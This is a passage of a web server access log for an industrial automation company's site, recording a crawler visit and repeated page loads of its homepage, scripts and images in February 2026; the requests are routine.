GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:44:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.243.250] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:48:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10386] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:50:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10370] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:53:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10363] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20847] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:06:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10363] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:08:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10331] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:13:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 